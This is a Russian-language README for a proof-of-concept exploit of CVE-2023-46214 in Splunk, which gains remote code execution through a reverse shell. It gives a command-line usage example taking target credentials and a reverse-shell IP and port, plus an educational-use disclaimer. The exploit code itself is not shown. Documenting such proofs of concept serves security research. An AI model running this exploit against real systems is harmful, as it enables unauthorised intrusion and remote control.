
PoC-эксплойт на Python для CVE-2023-46214, использующий функцию adddatamethods в Splunk для удалённого выполнения кода через обратную оболочку.
Эксплойт Proof of Concept для CVE-2023-46214, SVD-2023-1104

URL-адрес экземпляра Splunk, имя пользователя, пароль, IP-адрес reverse shell и порт — все они обязательны в качестве параметров командной строки. Например:
$ python3 CVE-2023-46214.py --url <Splunk_URL> --username <Username> --password <Password> --ip <Reverse_Shell_IP> --port <Reverse_Shell_Port>
Я написал статью в блоге, в которой подробно описал методологию, использованную для обнаружения этой уязвимости. Если у вас возникают какие-либо проблемы со скриптом, статья может оказаться полезной, поскольку в ней описаны ручные шаги эксплуатации.
Скрипт Proof of Concept (PoC), предоставленный в этом репозитории, служит исключительно образовательным и исследовательским целям. Его назначение — продемонстрировать конкретную уязвимость и помочь в понимании связанных с ней рисков безопасности.
Любое использование этого скрипта для несанкционированных действий, включая, помимо прочего, несанкционированный доступ к системам, несанкционированное тестирование или другие формы неправомерного использования, категорически запрещено.
Создатели и участники этого репозитория снимают с себя всякую ответственность за неправомерное использование или любой ущерб и вред, возникшие в результате использования этого скрипта. Используя этот скрипт, вы соглашаетесь использовать его ответственно и на свой собственный риск.